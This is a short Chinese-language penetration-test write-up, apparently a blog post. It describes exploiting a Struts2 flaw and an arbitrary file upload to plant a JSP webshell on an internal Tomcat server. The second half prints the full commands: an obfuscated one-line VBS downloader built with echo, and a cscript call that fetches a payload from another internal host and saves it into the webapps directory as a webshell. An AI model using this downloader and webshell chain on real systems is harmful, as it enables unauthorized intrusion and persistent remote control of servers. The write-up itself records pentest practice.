前言
在项目中拿到一个比较有意思的shell。在此记录一下。
struts漏洞
拿眼一打,struts2框架。工具尝试扫描,果然存在漏洞。
image.png但是确无法使用该工具的上传功能。猜测应该是权限不够导致的。
文件上传
在登录系统后发现一处文件上传。
image.png测试发现可进行任意文件上传。上传jsp马试试
image.pngemmm。好像没有配置java环境,且不在同一台服务器。
尝试上传txt文本文件
访问一下。
image.png确定是jsp马。
现在条件是:无法连接外网、有文件上传漏洞、命令执行漏洞。
怎么拿shell呢?
思路:利用命令执行powershell或vbs从192.168.40.13的服务器下载到192.168.40.21(不知为何powershell没有成功)
vbs一句话下载payload
1.echo命令输出创建downfile.vbs文件。注意转义
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
2.downfile.vbs从192.168.40.13服务器下载文件到192.168.40.21服务器
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp
image.png
下载的txt文件重命名为jsp一句话木马
ok!!!尝试访问
Nice!!!
image.png